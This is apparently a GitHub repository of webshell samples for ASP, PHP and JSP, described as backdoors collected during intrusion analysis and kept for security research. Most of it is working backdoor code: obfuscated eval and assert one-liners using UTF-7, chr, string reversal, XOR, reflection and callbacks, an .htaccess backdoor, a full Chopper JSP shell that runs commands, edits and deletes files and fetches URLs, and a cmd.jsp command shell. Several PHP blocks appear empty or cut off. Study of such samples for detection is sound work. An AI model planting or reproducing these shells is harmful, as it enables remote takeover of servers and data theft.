├── .gitignore ├── ASP └── README.md ├── PHP ├── README.md ├── apache_htaccess_backdoor │ ├── .htaccess │ └── shell.txt ├── array.php ├── array2.php ├── array_map.php ├── assert.php ├── assert2.php ├── assert3.php ├── callback1.php ├── callback2.php ├── callback3.php ├── callback4.php ├── check_pass1.php ├── check_pass2.php ├── chr.php ├── cmd.php ├── eval.php ├── fan.php ├── key.php ├── plus.php ├── preg_replace.php ├── reflect.php ├── shell.php ├── shell2.php ├── shell3.php ├── shell4.php ├── xor.php └── zhushi.php ├── README.md └── jsp ├── chopper.jsp ├── cmd.jsp ├── joychou.war └── jspspy.jsp /.gitignore: -------------------------------------------------------------------------------- 1 | .idea/ -------------------------------------------------------------------------------- /ASP/README.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | # ASP一句话木马 4 | 5 | 6 | ## 标准一句话 7 | 8 | ``` 9 | <%eval request("sb")%> 10 | 11 | <%execute request("sb")%> 12 | 13 | <%Eval(Request(chr(35)))%> password:# 14 | 15 | <%Eval(((Request(chr(35)))))%> 可以有多对括号 16 | 17 | <%ExecuteGlobal request("sb")%> 18 | 19 | <%eval request.form("#")%> 20 | 21 | <%eval request.item("#")%> 22 | 23 | <%eval request("chopper")%> 24 | 25 | <%execute request("1")%> 26 | 27 | 28 | // 单独运行500错误,但是菜刀能连。 29 | <%a=request("1")%><%execute a%> 30 | 31 | // 单独运行不报错,菜刀能连 32 | <%a=request("1")%><%eval a%> 33 | 34 | // 单独运行500错误,但是菜刀能连。 35 | <%a=request("1")%><%executeglobal a%> 36 | ``` 37 | 38 | 39 | ## 利用utf-7编码 40 | 41 | 密码是#,解密只需要将+k-去掉即可,这里的k可以是任意字符,长度也是随意。 42 | 43 | ``` 44 | <%@codepage=65000%> 45 | <%r+k-es+k-p+k-on+k-se.co+k-d+k-e+k-p+k-age=936:e+k-v+k-a+k-l r+k-e+k-q+k-u+k-e+k-s+k-t("#")%> 46 | ``` 47 | 48 | 解密后 49 | 50 | ``` 51 | <%@codepage=65000%> 52 | <%response.codepage=936:eval request("#")%> 53 | ``` 54 | 55 | 密码是:c 56 | 57 | ``` 58 | <%@codepage=65000%> 59 | <%e+x-v+x-a+x-l(+x-r+x-e+x-q+x-u+x-e+x-s+x-t+x-(+x-+ACI-c+ACI)+x-)+x-%> 60 | ``` 61 | 62 | 63 | 
64 | ## 字符串逆序 65 | 66 | 67 | StrReverse Replace加密,解密后为:Execute eval request("cmd") 68 | 69 | ``` 70 | <% 71 | 72 | Function decode(Code) 73 | decode=Replace(StrReverse(Code),"/*/","""") 74 | End Function 75 | Execute decode(")/*/dmc/*/(tseuqer lave") 76 | %> A 77 | ``` 78 | 79 | ASP自带逆序函数 80 | 81 | ``` 82 | <%execute(strreverse(")""xx""(tseuqer lave"))%> 83 | ``` 84 | 85 | ## 利用chr ,request 86 | 87 | ``` 88 | <%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("1"))%> 89 | ``` 90 | 91 | 92 | ## 利用asp的&连接符 93 | 94 | ``` 95 | <% eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")") %> 96 | ``` 97 | 98 | ## 拆分 99 | 100 | ``` 101 | <% 102 | xx=request("xx") 103 | eval xx 104 | %> 105 | ``` 106 | 107 | ``` 108 | <% 109 | xx=request("xx") 110 | Rain=xx 111 | eval Rain 112 | %> 113 | ``` 114 | 115 | ``` 116 | <% 117 | xx=request("xx") 118 | Rain=xx 119 | bb=Rain 120 | if 1=0 then 121 | response.write("123") 122 | else 123 | eval bb 124 | end if 125 | %> 126 | ``` 127 | 128 | ## 字符串替换(replace函数) 129 | 130 | ``` 131 | <% 132 | xxx="e0x0e0c0ut0e(0req0ue0st(""x0x""))" 133 | xxx=replace(xxx,"0","") 134 | eval xxx 135 | %> 136 | ``` 137 | 138 | 139 | ## chr()连接字符串 140 | 141 | ``` 142 | <%eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("sz"))%> 143 | ``` 144 | 145 | ## Mid()连接字符串 146 | 147 | 基本思路:乱序一个字符串然后反复Mid取字符构成一句话。 148 | 149 | ``` 150 | <% 151 | Function d(s) 152 | d=Mid(love,s,1) 153 | End Function 154 | love="(tqxuesrav l)"&"""" 155 | execute(d(6)&d(10)&d(9)&d(12)&d(11)&d(8)&d(6)&d(3)&d(5)&d(6)&d(7)&d(2)&d(1)&d(14)&d(4)&d(4)&d(14)&d(13)) 156 | %> 157 | ``` 158 | 159 | ## 字符连接成字符串 160 | 161 | ``` 162 | <%eval("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0″&"-"&"2″&"-"&"5″&")"&")")%> 密码-7 163 | ``` 164 | 165 | ## Jscript 166 | 167 | ``` 168 | < %@ Page Language = Jscript %> 169 | < %var/*-/*-*/P/*-/*-*/=/*-/*-*/"e"+"v"+/*-/*-*/ 170 | 
"a"+"l"+"("+"R"+"e"+/*-/*-*/"q"+"u"+"e"/*-/*-*/+"s"+"t"+ 171 | "[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]"+ 172 | ","+"\""+"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"+"\""+")";eval 173 | (/*-/*-*/P/*-/*-*/,/*-/*-*/"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"/*-/*-*/);%> 密码 -7 174 | ``` 175 | 176 | ``` 177 | < %@ Page Language="Jscript"%>< %eval(Request.Item["shezhang"],"unsafe");%> 178 | ``` 179 | -------------------------------------------------------------------------------- /PHP/README.md: -------------------------------------------------------------------------------- 1 | # PHP一句话木马 2 | 3 | ## 数组 4 | 5 | 利用数组,维数自己随意构造 6 | 7 | ```php 8 | 14 | ``` 15 | 16 | 17 | ```php 18 | 23 | 24 | ``` 25 | 26 | 利用key获取数组key 27 | 28 | ```php 29 | 33 | ``` 34 | 35 | http://localhost/test.php?assert=test,菜刀密码cmd 36 | 37 | 38 | ## 变量 39 | 40 | ```php 41 | 45 | ``` 46 | 47 | ```php 48 | 53 | ``` 54 | ## chr 55 | 56 | ```php 57 | 60 | ``` 61 | 62 | ```php 63 | 66 | ``` 67 | 解密后: 68 | 69 | ```php 70 | 73 | ``` 74 | 75 | ```php 76 | 86 | ``` 87 | 88 | 解密后:`eval($_POST[1]);` 89 | ## 换行 90 | 91 | ```php 92 | 93 | 98 | 99 | ``` 100 | 101 | ```php 102 | 108 | 109 | ``` 110 | 111 | ## 空格 112 | 113 | 密码为cmd 114 | 115 | ```php 116 | 117 | ``` 118 | 119 | ## 注释 120 | 121 | ```php 122 | 128 | ``` 129 | 130 | ## 和正常代码混淆 131 | 132 | ```php 133 | 143 | ``` 144 | 145 | 解密后: 146 | 147 | ```php 148 | 解密后为:if ( isset( $_REQUEST['pass'] )){@eval( base64_decode( $_REQUEST['pass'] ) );}else{@eval( $_REQUEST['addimg'] );} 149 | ``` 150 | 151 | 152 | ```php 153 | 172 | ``` 173 | 174 | 解密后为:`@eval($_POST[adm])` 175 | 176 | 177 | ```php 178 | 205 | ``` 206 | 207 | ```php 208 | 1000000){ 211 | die('404'); 212 | } 213 | if (isset($_POST["\x70\x61\x73\x73"]) && isset($_POST["\x63\x68\x65\x63\x6b"])) 214 | { 215 | $__PHP_debug = array ( 216 | 'ZendName' => '70,61,73,73', 217 | 'ZendPort' => '63,68,65,63,6b', 218 | 'ZendSalt' => '792e19812fafd57c7ac150af768d95ce' 219 | ); 220 | 221 | $__PHP_replace = array ( 222 | 
pack('H*', join('', explode(',', $__PHP_debug['ZendName']))), 223 | pack('H*', join('', explode(',', $__PHP_debug['ZendPort']))), 224 | $__PHP_debug['ZendSalt'] 225 | ); 226 | 227 | $__PHP_request = &$_POST; 228 | $__PHP_token = md5($__PHP_request[$__PHP_replace[0]]); 229 | 230 | if ($__PHP_token == $__PHP_replace[2]) 231 | { 232 | $__PHP_token = preg_replace ( 233 | chr(47).$__PHP_token.chr(47).chr(101), 234 | $__PHP_request[$__PHP_replace[1]], 235 | $__PHP_token 236 | ); 237 | 238 | unset ( 239 | $__PHP_debug, 240 | $__PHP_replace, 241 | $__PHP_request, 242 | $__PHP_token 243 | ); 244 | 245 | if(!defined('_DEBUG_TOKEN')) exit ('Get token fail!'); 246 | 247 | } 248 | } 249 | 250 | ``` 251 | 252 | ## PHP反射机制 253 | 254 | ```php 255 | getDocComment(); 266 | $payload = substr($str,strpos($str,'ev'),3); 267 | $payload .= substr($str,strpos($str,'l('),7); 268 | $payload .= substr($str,strpos($str,'T['),8); 269 | $exe = substr($str, strpos($str, 'as'), 4); 270 | $exe .= substr($str, strpos($str, 'rt'), 2); 271 | 272 | $exe($payload); 273 | ?> 274 | ``` 275 | 276 | 利用注释和php的反射机制(可获取注释),解密后: 277 | 278 | ```php 279 | assert(eval($_POST["c"])); 280 | ``` 281 | 282 | ## 回调 283 | 284 | 利用session_set_save_handler回调函数。 285 | 286 | ```php 287 | 311 | ``` 312 | 313 | 整个代码逻辑:session_set_save_handler设置6个回调,当seession_start的时候,自动调用第三个$session回调函数,第三个函数的原型是read(string $sessionId),这里相当于是assert(string $sessionId),而参数是sessionId。当调用`session_id($_REQUEST[phpcms]);`这句代码后,返回sessionId,最后就相当于执行 314 | `assert($_REQUEST[phpcms])` 315 | 316 | 317 | ```php 318 | 323 | ``` 324 | 325 | 326 | ```php 327 | 328 | 332 | ``` 333 | 334 | 335 | ```php 336 | 'assert')); 338 | //filter_var_array(array('test' => $_REQUEST['pass']), array('test' => array('filter' => FILTER_CALLBACK, 'options' => 'assert'))); 339 | ?> 340 | ``` 341 | 342 | 343 | ```php 344 | 349 | 350 | ``` 351 | 352 | 353 | ```php 354 | $_clasc = $_REQUEST['mod']; 355 | $arr = array($_POST['bato'] => '|.*|e',); 356 | @array_walk_recursive($arr, 
$_clasc, ''); 357 | ``` 358 | 359 | 360 | ## 反引号 361 | 362 | 利用反引号执行命令 363 | 364 | ```php 365 | 372 | ``` 373 | 374 | ## + 375 | 376 | ```php 377 | 408 | ``` 409 | 410 | ## xor 411 | 412 | ```php 413 | 422 | ``` 423 | 424 | ## 反引号 425 | 426 | ```php 427 | 432 | ``` 433 | 434 | 解密后:`assert($_REQUEST[jcmemeda])` 435 | 436 | ## Cookie 437 | 438 | ```php 439 | 451 | ``` 452 | 453 | 拿Nginx举例,修改fastcgi_params参数,添加变量如下: 454 | 455 | ``` 456 | fastcgi_param HTTP_X_E10EC8 //e; 457 | fastcgi_param HTTP_X_CURRENT assert('phpinfo()'); 458 | ``` 459 | 460 | reload nginx后,即可执行phpinfo 461 | 462 | ## `php://input` 463 | 464 | 465 | ```php 466 | ' . file_get_contents('php://input')); 467 | ``` 468 | 469 | 可执行php代码,post方式提交`` 470 | -------------------------------------------------------------------------------- /PHP/apache_htaccess_backdoor/.htaccess: -------------------------------------------------------------------------------- 1 | 2 | SetHandler application/x-httpd-php 3 | -------------------------------------------------------------------------------- /PHP/apache_htaccess_backdoor/shell.txt: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /PHP/array.php: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /PHP/array2.php: -------------------------------------------------------------------------------- 1 | 7 | -------------------------------------------------------------------------------- /PHP/array_map.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /PHP/assert.php: -------------------------------------------------------------------------------- 1 | 5 | 
-------------------------------------------------------------------------------- /PHP/assert2.php: -------------------------------------------------------------------------------- 1 | 7 | -------------------------------------------------------------------------------- /PHP/assert3.php: -------------------------------------------------------------------------------- 1 | 7 | 8 | -------------------------------------------------------------------------------- /PHP/callback1.php: -------------------------------------------------------------------------------- 1 | register_tick_function: 2 | 7 | -------------------------------------------------------------------------------- /PHP/callback2.php: -------------------------------------------------------------------------------- 1 | register_shutdown_function 2 | 6 | -------------------------------------------------------------------------------- /PHP/callback3.php: -------------------------------------------------------------------------------- 1 | 'assert')); 3 | //filter_var_array(array('test' => $_REQUEST['pass']), array('test' => array('filter' => FILTER_CALLBACK, 'options' => 'assert'))); 4 | ?> 5 | -------------------------------------------------------------------------------- /PHP/callback4.php: -------------------------------------------------------------------------------- 1 | array_filter 2 | 7 | -------------------------------------------------------------------------------- /PHP/check_pass1.php: -------------------------------------------------------------------------------- 1 | 1000000){ 7 | die('404'); 8 | } 9 | if (isset($_POST["\x70\x61\x73\x73"]) && isset($_POST["\x63\x68\x65\x63\x6b"])) 10 | { 11 | $__PHP_debug = array ( 12 | 'ZendName' => '70,61,73,73', 13 | 'ZendPort' => '63,68,65,63,6b', 14 | 'ZendSalt' => '21232f297a57a5a743894a0e4a801fc3' //md5(admin) 15 | ); 16 | 17 | $__PHP_replace = array ( 18 | pack('H*', join('', explode(',', $__PHP_debug['ZendName']))), 19 | pack('H*', join('', explode(',', 
$__PHP_debug['ZendPort']))), 20 | $__PHP_debug['ZendSalt'] 21 | ); 22 | $__PHP_request = &$_POST; 23 | $__PHP_token = md5($__PHP_request[$__PHP_replace[0]]); 24 | 25 | if ($__PHP_token == $__PHP_replace[2]) 26 | { 27 | $__PHP_token = preg_replace ( 28 | chr(47).$__PHP_token.chr(47).chr(101), 29 | $__PHP_request[$__PHP_replace[1]], 30 | $__PHP_token 31 | ); 32 | 33 | unset ( 34 | $__PHP_debug, 35 | $__PHP_replace, 36 | $__PHP_request, 37 | $__PHP_token 38 | ); 39 | 40 | if(!defined('_DEBUG_TOKEN')) exit ('Get token fail!'); 41 | 42 | } 43 | } -------------------------------------------------------------------------------- /PHP/check_pass2.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /PHP/chr.php: -------------------------------------------------------------------------------- 1 | 4 | -------------------------------------------------------------------------------- /PHP/cmd.php: -------------------------------------------------------------------------------- 1 | 8 | -------------------------------------------------------------------------------- /PHP/eval.php: -------------------------------------------------------------------------------- 1 | 4 | 5 | -------------------------------------------------------------------------------- /PHP/fan.php: -------------------------------------------------------------------------------- 1 | 7 | -------------------------------------------------------------------------------- /PHP/key.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /PHP/plus.php: -------------------------------------------------------------------------------- 1 | 33 | -------------------------------------------------------------------------------- /PHP/preg_replace.php: 
-------------------------------------------------------------------------------- 1 | ?php 2 | // pwd=D8OWX2Y 3 | preg_replace(chr(47).chr(100).chr(0x75).chr(111).chr(115).chr(111).chr(102).chr(116).chr(0x2f).chr(0x69).chr(115).chr(101),chr(0x40).chr(0x65).chr(0x76).chr(97).chr(0x6c).chr(0x28).chr(0x27).chr(0x40).chr(101).chr(0x76).chr(0x61).chr(0x6c).chr(40).chr(40).chr(0x67).chr(0x65).chr(116).chr(95).chr(0x6d).chr(97).chr(0x67).chr(0x69).chr(0x63).chr(0x5f).chr(113).chr(117).chr(0x6f).chr(0x74).chr(101).chr(115).chr(95).chr(0x67).chr(112).chr(0x63).chr(40).chr(41).chr(0x3f).chr(0x73).chr(0x74).chr(114).chr(0x69).chr(112).chr(115).chr(0x6c).chr(97).chr(0x73).chr(0x68).chr(0x65).chr(0x73).chr(40).chr(36).chr(0x5f).chr(0x50).chr(79).chr(0x53).chr(0x54).chr(91).chr(68).chr(0x38).chr(79).chr(0x57).chr(88).chr(0x32).chr(89).chr(0x5d).chr(41).chr(58).chr(36).chr(95).chr(80).chr(79).chr(0x53).chr(84).chr(0x5b).chr(0x44).chr(0x38).chr(79).chr(87).chr(0x58).chr(0x32).chr(0x59).chr(0x5d).chr(41).chr(41).chr(0x3b).chr(39).chr(0x29).chr(59),chr(0x64).chr(117).chr(111).chr(115).chr(0x6f).chr(102).chr(116)); 4 | ?> 5 | -------------------------------------------------------------------------------- /PHP/reflect.php: -------------------------------------------------------------------------------- 1 | getDocComment(); 12 | $payload = substr($str,strpos($str,'ev'),3); 13 | $payload .= substr($str,strpos($str,'l('),7); 14 | $payload .= substr($str,strpos($str,'T['),8); 15 | $exe = substr($str, strpos($str, 'as'), 4); 16 | $exe .= substr($str, strpos($str, 'rt'), 2); 17 | 18 | $exe($payload); 19 | ?> 20 | -------------------------------------------------------------------------------- /PHP/shell.php: -------------------------------------------------------------------------------- 1 | 7 | -------------------------------------------------------------------------------- /PHP/shell2.php: -------------------------------------------------------------------------------- 1 | 11 | 
-------------------------------------------------------------------------------- /PHP/shell3.php: -------------------------------------------------------------------------------- 1 | 21 | -------------------------------------------------------------------------------- /PHP/shell4.php: -------------------------------------------------------------------------------- 1 | 25 | -------------------------------------------------------------------------------- /PHP/xor.php: -------------------------------------------------------------------------------- 1 | 10 | -------------------------------------------------------------------------------- /PHP/zhushi.php: -------------------------------------------------------------------------------- 1 | 7 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # webshell 2 | 3 | 本仓库收录的样本,几乎都是当年在乙方做入侵分析时发现的后门。 4 | 5 | - [PHP](https://github.com/JoyChou93/webshell/blob/master/PHP/README.md) 6 | - [ASP](https://github.com/JoyChou93/webshell/blob/master/ASP/README.md) 7 | - [JSP](https://github.com/JoyChou93/webshell/blob/master/JSP/README.md) 8 | 9 | 该项目的所有内容,只用来安全研究。请勿用作其他用途。 10 | -------------------------------------------------------------------------------- /jsp/chopper.jsp: -------------------------------------------------------------------------------- 1 | <%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%> 2 | <%! 
3 | String Pwd = "joychou"; 4 | String cs = "UTF-8"; 5 | 6 | String EC(String s) throws Exception { 7 | return new String(s.getBytes("ISO-8859-1"),cs); 8 | } 9 | 10 | Connection GC(String s) throws Exception { 11 | String[] x = s.trim().split("choraheiheihei"); 12 | Class.forName(x[0].trim()); 13 | if(x[1].indexOf("jdbc:oracle")!=-1){ 14 | return DriverManager.getConnection(x[1].trim()+":"+x[4],x[2].equalsIgnoreCase("[/null]")?"":x[2],x[3].equalsIgnoreCase("[/null]")?"":x[3]); 15 | }else{ 16 | Connection c = DriverManager.getConnection(x[1].trim(),x[2].equalsIgnoreCase("[/null]")?"":x[2],x[3].equalsIgnoreCase("[/null]")?"":x[3]); 17 | if (x.length > 4) { 18 | c.setCatalog(x[4]); 19 | } 20 | return c; 21 | } 22 | } 23 | 24 | void AA(StringBuffer sb) throws Exception { 25 | File k = new File(""); 26 | File r[] = k.listRoots(); 27 | for (int i = 0; i < r.length; i++) { 28 | sb.append(r[i].toString().substring(0, 2)); 29 | } 30 | } 31 | 32 | void BB(String s, StringBuffer sb) throws Exception { 33 | File oF = new File(s), l[] = oF.listFiles(); 34 | String sT, sQ, sF = ""; 35 | java.util.Date dt; 36 | SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); 37 | for (int i = 0; i < l.length; i++) { 38 | dt = new java.util.Date(l[i].lastModified()); 39 | sT = fm.format(dt); 40 | sQ = l[i].canRead() ? "R" : ""; 41 | sQ += l[i].canWrite() ? 
" W" : ""; 42 | if (l[i].isDirectory()) { 43 | sb.append(l[i].getName() + "/\t" + sT + "\t" + l[i].length()+ "\t" + sQ + "\n"); 44 | } else { 45 | sF+=l[i].getName() + "\t" + sT + "\t" + l[i].length() + "\t"+ sQ + "\n"; 46 | } 47 | } 48 | sb.append(sF); 49 | } 50 | 51 | void EE(String s) throws Exception { 52 | File f = new File(s); 53 | if (f.isDirectory()) { 54 | File x[] = f.listFiles(); 55 | for (int k = 0; k < x.length; k++) { 56 | if (!x[k].delete()) { 57 | EE(x[k].getPath()); 58 | } 59 | } 60 | } 61 | f.delete(); 62 | } 63 | 64 | void FF(String s, HttpServletResponse r) throws Exception { 65 | int n; 66 | byte[] b = new byte[512]; 67 | r.reset(); 68 | ServletOutputStream os = r.getOutputStream(); 69 | BufferedInputStream is = new BufferedInputStream(new FileInputStream(s)); 70 | os.write(("->" + "|").getBytes(), 0, 3); 71 | while ((n = is.read(b, 0, 512)) != -1) { 72 | os.write(b, 0, n); 73 | } 74 | os.write(("|" + "<-").getBytes(), 0, 3); 75 | os.close(); 76 | is.close(); 77 | } 78 | 79 | void GG(String s, String d) throws Exception { 80 | String h = "0123456789ABCDEF"; 81 | File f = new File(s); 82 | f.createNewFile(); 83 | FileOutputStream os = new FileOutputStream(f); 84 | for (int i = 0; i < d.length(); i += 2) { 85 | os.write((h.indexOf(d.charAt(i)) << 4 | h.indexOf(d.charAt(i + 1)))); 86 | } 87 | os.close(); 88 | } 89 | 90 | void HH(String s, String d) throws Exception { 91 | File sf = new File(s), df = new File(d); 92 | if (sf.isDirectory()) { 93 | if (!df.exists()) { 94 | df.mkdir(); 95 | } 96 | File z[] = sf.listFiles(); 97 | for (int j = 0; j < z.length; j++) { 98 | HH(s + "/" + z[j].getName(), d + "/" + z[j].getName()); 99 | } 100 | } else { 101 | FileInputStream is = new FileInputStream(sf); 102 | FileOutputStream os = new FileOutputStream(df); 103 | int n; 104 | byte[] b = new byte[512]; 105 | while ((n = is.read(b, 0, 512)) != -1) { 106 | os.write(b, 0, n); 107 | } 108 | is.close(); 109 | os.close(); 110 | } 111 | } 112 | 113 | void II(String 
s, String d) throws Exception { 114 | File sf = new File(s), df = new File(d); 115 | sf.renameTo(df); 116 | } 117 | 118 | void JJ(String s) throws Exception { 119 | File f = new File(s); 120 | f.mkdir(); 121 | } 122 | 123 | void KK(String s, String t) throws Exception { 124 | File f = new File(s); 125 | SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); 126 | java.util.Date dt = fm.parse(t); 127 | f.setLastModified(dt.getTime()); 128 | } 129 | 130 | void LL(String s, String d) throws Exception { 131 | URL u = new URL(s); 132 | int n = 0; 133 | FileOutputStream os = new FileOutputStream(d); 134 | HttpURLConnection h = (HttpURLConnection) u.openConnection(); 135 | InputStream is = h.getInputStream(); 136 | byte[] b = new byte[512]; 137 | while ((n = is.read(b)) != -1) { 138 | os.write(b, 0, n); 139 | } 140 | os.close(); 141 | is.close(); 142 | h.disconnect(); 143 | } 144 | 145 | void MM(InputStream is, StringBuffer sb) throws Exception { 146 | String l; 147 | BufferedReader br = new BufferedReader(new InputStreamReader(is)); 148 | while ((l = br.readLine()) != null) { 149 | sb.append(l + "\r\n"); 150 | } 151 | } 152 | 153 | void NN(String s, StringBuffer sb) throws Exception { 154 | Connection c = GC(s); 155 | ResultSet r = s.indexOf("jdbc:oracle")!=-1?c.getMetaData().getSchemas():c.getMetaData().getCatalogs(); 156 | while (r.next()) { 157 | sb.append(r.getString(1) + "\t|\t\r\n"); 158 | } 159 | r.close(); 160 | c.close(); 161 | } 162 | 163 | void OO(String s, StringBuffer sb) throws Exception { 164 | Connection c = GC(s); 165 | String[] x = s.trim().split("choraheiheihei"); 166 | ResultSet r = c.getMetaData().getTables(null,s.indexOf("jdbc:oracle")!=-1?x.length>5?x[5]:x[4]:null, "%", new String[]{"TABLE"}); 167 | while (r.next()) { 168 | sb.append(r.getString("TABLE_NAME") + "\t|\t\r\n"); 169 | } 170 | r.close(); 171 | c.close(); 172 | } 173 | 174 | void PP(String s, StringBuffer sb) throws Exception { 175 | String[] x = s.trim().split("\r\n"); 176 | 
Connection c = GC(s); 177 | Statement m = c.createStatement(1005, 1007); 178 | ResultSet r = m.executeQuery("select * from " + x[x.length-1]); 179 | ResultSetMetaData d = r.getMetaData(); 180 | for (int i = 1; i <= d.getColumnCount(); i++) { 181 | sb.append(d.getColumnName(i) + " (" + d.getColumnTypeName(i)+ ")\t"); 182 | } 183 | r.close(); 184 | m.close(); 185 | c.close(); 186 | } 187 | 188 | void QQ(String cs, String s, String q, StringBuffer sb,String p) throws Exception { 189 | Connection c = GC(s); 190 | Statement m = c.createStatement(1005, 1008); 191 | BufferedWriter bw = null; 192 | try { 193 | ResultSet r = m.executeQuery(q.indexOf("--f:")!=-1?q.substring(0,q.indexOf("--f:")):q); 194 | ResultSetMetaData d = r.getMetaData(); 195 | int n = d.getColumnCount(); 196 | for (int i = 1; i <= n; i++) { 197 | sb.append(d.getColumnName(i) + "\t|\t"); 198 | } 199 | sb.append("\r\n"); 200 | if(q.indexOf("--f:")!=-1){ 201 | File file = new File(p); 202 | if(q.indexOf("-to:")==-1){ 203 | file.mkdir(); 204 | } 205 | bw = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(q.indexOf("-to:")!=-1?p.trim():p+q.substring(q.indexOf("--f:") + 4,q.length()).trim()),true),cs)); 206 | } 207 | while (r.next()) { 208 | for (int i = 1; i <= n; i++) { 209 | if(q.indexOf("--f:")!=-1){ 210 | bw.write(r.getObject(i)+""+"\t"); 211 | bw.flush(); 212 | }else{ 213 | sb.append(r.getObject(i)+"" + "\t|\t"); 214 | } 215 | } 216 | if(bw!=null){bw.newLine();} 217 | sb.append("\r\n"); 218 | } 219 | r.close(); 220 | if(bw!=null){bw.close();} 221 | } catch (Exception e) { 222 | sb.append("Result\t|\t\r\n"); 223 | try { 224 | m.executeUpdate(q); 225 | sb.append("Execute Successfully!\t|\t\r\n"); 226 | } catch (Exception ee) { 227 | sb.append(ee.toString() + "\t|\t\r\n"); 228 | } 229 | } 230 | m.close(); 231 | c.close(); 232 | } 233 | %> 234 | <% 235 | 236 | 237 | //String Z = EC(request.getParameter(Pwd) + "", cs); 238 | 239 | cs = request.getParameter("code") != null ? 
request.getParameter("code")+ "":cs; 240 | request.setCharacterEncoding(cs); 241 | response.setContentType("text/html;charset=" + cs); 242 | StringBuffer sb = new StringBuffer(""); 243 | if (request.getParameter(Pwd) != null) { 244 | 245 | try { 246 | String Z = EC(request.getParameter("action") + ""); 247 | String z1 = EC(request.getParameter("z1") + ""); 248 | String z2 = EC(request.getParameter("z2") + ""); 249 | sb.append("->" + "|"); 250 | String s = request.getSession().getServletContext().getRealPath("/"); 251 | if (Z.equals("A")) { 252 | sb.append(s + "\t"); 253 | if (!s.substring(0, 1).equals("/")) { 254 | AA(sb); 255 | } 256 | } else if (Z.equals("B")) { 257 | BB(z1, sb); 258 | } else if (Z.equals("C")) { 259 | String l = ""; 260 | BufferedReader br = new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1)))); 261 | while ((l = br.readLine()) != null) { 262 | sb.append(l + "\r\n"); 263 | } 264 | br.close(); 265 | } else if (Z.equals("D")) { 266 | BufferedWriter bw = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1)))); 267 | bw.write(z2); 268 | bw.close(); 269 | sb.append("1"); 270 | } else if (Z.equals("E")) { 271 | EE(z1); 272 | sb.append("1"); 273 | } else if (Z.equals("F")) { 274 | FF(z1, response); 275 | } else if (Z.equals("G")) { 276 | GG(z1, z2); 277 | sb.append("1"); 278 | } else if (Z.equals("H")) { 279 | HH(z1, z2); 280 | sb.append("1"); 281 | } else if (Z.equals("I")) { 282 | II(z1, z2); 283 | sb.append("1"); 284 | } else if (Z.equals("J")) { 285 | JJ(z1); 286 | sb.append("1"); 287 | } else if (Z.equals("K")) { 288 | KK(z1, z2); 289 | sb.append("1"); 290 | } else if (Z.equals("L")) { 291 | LL(z1, z2); 292 | sb.append("1"); 293 | } else if (Z.equals("M")) { 294 | String[] c = { z1.substring(2), z1.substring(0, 2), z2 }; 295 | Process p = Runtime.getRuntime().exec(c); 296 | MM(p.getInputStream(), sb); 297 | MM(p.getErrorStream(), sb); 298 | } else if (Z.equals("N")) { 299 | NN(z1, sb); 300 | } else if 
(Z.equals("O")) { 301 | OO(z1, sb); 302 | } else if (Z.equals("P")) { 303 | PP(z1, sb); 304 | } else if (Z.equals("Q")) { 305 | QQ(cs, z1, z2, sb,z2.indexOf("-to:")!=-1?z2.substring(z2.indexOf("-to:")+4,z2.length()):s.replaceAll("\\\\", "/")+"images/"); 306 | } 307 | } catch (Exception e) { 308 | sb.append("ERROR" + ":// " + e.toString()); 309 | } 310 | sb.append("|" + "<-"); 311 | out.print(sb.toString()); 312 | } 313 | %> 314 | 315 | -------------------------------------------------------------------------------- /jsp/cmd.jsp: -------------------------------------------------------------------------------- 1 | <%@ page import="java.util.*,java.io.*"%> <% %> 2 |
3 | 4 | 5 |
 
 6 | <%
 7 |  if ( request.getParameter( "comment" ) != null )
 8 |  {
 9 | 	 out.println( "Command: " + request.getParameter( "comment" ) + "
" ); 10 | Process p = Runtime.getRuntime().exec( request.getParameter( "comment" ) ); 11 | OutputStream os = p.getOutputStream(); 12 | InputStream in = p.getInputStream(); 13 | DataInputStream dis = new DataInputStream( in ); 14 | String disr = dis.readLine(); 15 | while ( disr != null ) 16 | { 17 | out.println( disr ); disr = dis.readLine(); 18 | } 19 | } 20 | %> 21 |
22 | 23 | -------------------------------------------------------------------------------- /jsp/joychou.war: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JoyChou93/webshell/2185acc2b494f7c0dd8487273d514fb89ebe9240/jsp/joychou.war -------------------------------------------------------------------------------- /jsp/jspspy.jsp: -------------------------------------------------------------------------------- 1 | <%@page pageEncoding="utf-8"%> 2 | <%@page import="java.io.*"%> 3 | <%@page import="java.util.*"%> 4 | <%@page import="java.util.regex.*"%> 5 | <%@page import="java.sql.*"%> 6 | <%@page import="java.nio.charset.*"%> 7 | <%@page import="javax.servlet.http.HttpServletRequestWrapper"%> 8 | <%@page import="java.text.*"%> 9 | <%@page import="java.net.*"%> 10 | <%@page import="java.util.zip.*"%> 11 | <%@page import="java.awt.*"%> 12 | <%@page import="java.awt.image.*"%> 13 | <%@page import="javax.imageio.*"%> 14 | <%@page import="java.awt.datatransfer.DataFlavor"%> 15 | <%@page import="java.util.prefs.Preferences"%> 16 | <%! 
      // Page-wide constants and mutable static state of this JSP.
      // PW is a hard-coded password; the scriptlet near the end of this span compares the
